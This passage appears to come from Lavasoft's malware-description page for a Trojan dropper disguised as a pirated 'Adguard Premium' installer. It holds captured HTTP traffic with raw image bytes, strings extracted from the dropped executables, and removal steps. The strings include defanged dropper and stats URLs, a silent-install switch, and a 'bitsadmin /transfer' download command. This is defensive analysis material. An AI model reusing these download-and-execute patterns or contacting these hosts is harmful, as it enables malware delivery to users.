X-Amz-Cf-Id: GulH9TO7EDPAj1sN7RIJNE4zOHS8DvRB0fyrYGs5JXBeBp_nJ6CCfQ==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....u.,....e........o
t.............o..nC.............GCn.t.D.............BC.EF.............
EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*...
.!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY
.....K....c...Vg,.......f. 0.k... \..b.. [email protected]...)U.U.b......W.0.....
.t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........
Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. .............
.................. }.J0...&x...f...-......AH.]pa..(..".A....=.(....p..
..X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P.
[email protected]..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t.......
.....!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt..
....m...k..........n.f.AH...k...............p..../.......7.....!...Wl.
K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t.
...L7...s....;....
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:08 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Content-Disposition: attachment; filename="decline.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ahaHf0NPOJMFXfDdFGUwHbgsaGECxuNAtQm0pNh0oRTYud86V6oNhQ==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....t.,....e........n
s.............n..mB.............FBm.s.C.............AB.DE.............
DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..
a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D
..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J
.... ^[email protected]..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y........
..Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._
9p........{.........z... {[[email protected].!. f.".%j..
.#bh#._....[....@.)[email protected]..[[email protected].`.....|...h..
..^[email protected]..`...S.........o....z....7......9.!b.!...Vji. .... ....`&l
t;A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........
a...&`...6.l.bP0....;n._. [email protected]......,....k......!h4
....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-
t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Content-Disposition: attachment; filename="accept.gif"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5-logU4zXfubbXVWdktS2We-iKyYQRd1H5xT_N--qtCtO_qPTCUE5g==
GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww
?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*[email protected]<.A)[email protected]
.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}.
.o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C
...H.KL.P..................[._&. ...........................|.~......(
.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m..
.......I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8
(.,A.K......C.I%.*..2?.Hgug)[email protected]>.F=.D6.;...'.)*.(*./-
.-?.=-..:.C../<.C...5.<[email protected]:.A,.2;.B;.BQ.\...O.Tkyl/.
3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K
#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|....
.....hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!.
.XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c
011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf=
"hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description 
rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef
="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns
.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E41
1B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150
F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.millesimalnonremuneration.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.leadingdownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 29603
Connection: keep-alive
Date: Wed, 21 Sep 2016 09:32:09 GMT
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "27e01b52fcb3f43ff9d3f29b0af69137"
Content-Disposition: attachment; filename="dm_left_image.png"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12926
X-Cache: Hit from cloudfront
Via: 1.1 55bf5f93fad6af1fd2ee6a7f298862b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MsSkNUD0eukq27uUrUFLjT31PpJ2hKGqkyCy5XLtfKZAyJTHmJf8Sw==
.PNG........IHDR.......e.....5Z......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A22384F4BB6C11E488CDA27B
4BADD3EB" xmpMM:DocumentID="xmp.did:A22384F5BB6C11E488CDA27B4BADD3EB"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A22384F2BB6C11E488
CDA27B4BADD3EB" stRef:documentID="xmp.did:A22384F3BB6C11E488CDA27B4BAD
D3EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.O.8..p.IDATx...[..X.....I..12#.*..{z.f5.y[
....4..$..>.....X..#m.vU.LWfUf......u......`.#3"....H.x.....o......
.i.$...@.........~.Z..xd...w..,....;9......<..-...B.......o.....7._
..w.Y....kn?>...T=..|:..^k.;......".J..B.gM.f).|...<..rK....=.7.
.Z.g....SDG..`.tm.q......ZS...(.V.<....Y.....;z.,?>..|*...k..}ip
..C..=..|B...kV-W.....J....X....k...y>.[z.5.d.l..W.u.1/.....|...r.v
.r}..|*...k...........j<.....p|Q=........$.....C...<..-....{.`..
....._.?x......q.7S>.......W...'_...#..#.p..a.Gy.O...sM!........S..
.3^.p.s.|[email protected]|s3.......?..Bi.&....k._..........
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_616:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\LggJBBE5vd.exe
evenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp
r.php?program=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
System.dll
callback%d
.reloc
nsm2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\6j6GOciRXw
am=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
et.einteraccessor.bid/stub_maker.php?program=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201610132331
hXXp://ret.einteraccessor.bid/stub_maker.php?program=sevenzip&tid=10277909&pid=2273&b_typ=pe&reb=1&name=Adguard Premium v6.1.245.1212 ) + Patch [4realtorrentz]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

%original file name%.exe_616_rwx_10004000_00001000:

callback%d

LggJBBE5vd.exe_1608:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"
urusetman.info/taveara?q=setup&name=Adguard Premium v6.1.245.1212 
appVersion=2.92&instId=11&exe=1
ppname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\NSISdl.dll
%Program Files%
\NSISdl.dll
\635845710
hXXp://get.gunnightmar.club/stats.php?bu=
\nsArray.dll
ar_url
\\635845710
hXXp://get.iestharvest.club/error.php?string=
Adguard Premium v6.1.245.1212
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=
hXXp://get.ntemptheav.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=
/key=
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
Software\Microsoft\Windows\CurrentVersion\Internet Settings
1.1.1.6
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp
Setup__2140_il11.exe
SETUP_~1.EXE
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"")
itor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
Adguard Premium v6.1.245.1212 Setup
5845710
l=hXXp://gurusetman.info/taveara?q=setup&name=Adguard Premium v6.1.245.1212 
thessel.bid/stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Adguard Premium v6.1.245.1212 
dguard Premium v6.1.245.1212
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\LggJBBE5vd.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp
LggJBBE5vd.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
3224096
hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic=

LggJBBE5vd.exe_1608_rwx_10001000_00007000:

.text
`.rdata
@.data
.rsrc
@.reloc
/key=

Setup__2140_il11.exe_1740:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
PSSh0\A
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
rakis.unblamed.1 = s 'Inst Class'
CLSID = s '{e59781dd-ffd9-4ede-8b1c-043817fa2e37}'
rakis.unblamed = s 'Inst Class'
CurVer = s 'rakis.unblamed.1'
ForceRemove {e59781dd-ffd9-4ede-8b1c-043817fa2e37} = s 'Inst Class'
ProgID = s 'rakis.unblamed.1'
VersionIndependentProgID = s 'rakis.unblamed'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{38d2a8d3-f52b-4d86-a7b8-d71a1d37ba91}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Wed Sep 14 08:38:50 2016
11D1m1
7 8'8.898
9œ9R9r9
6-676=6[6
2"2)20262]2
3-3h4}4
7'80868{8
= >1>\>}>
>->6>_>|>
7 7$7(7~7
9";.;4;9;?;
5 5$5(5,50545
4686<6|6
808<8\8|8
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
A.tlb
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
%%X
version.dll
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
millesimalnonremuneration.site


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (178 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\580019566fa41[1].exe (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\LggJBBE5vd.exe (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\6j6GOciRXw (178 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\Setup__2140_il11.exe (55260 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\NSISdl.dll (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\635845710 (871 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\decline[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\next[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cancel1[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo[1].png (2150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\accept[1].gif (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\skip[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dm_left_image[1].png (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (29529 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].htm (7480 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\finish[1].gif (2 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now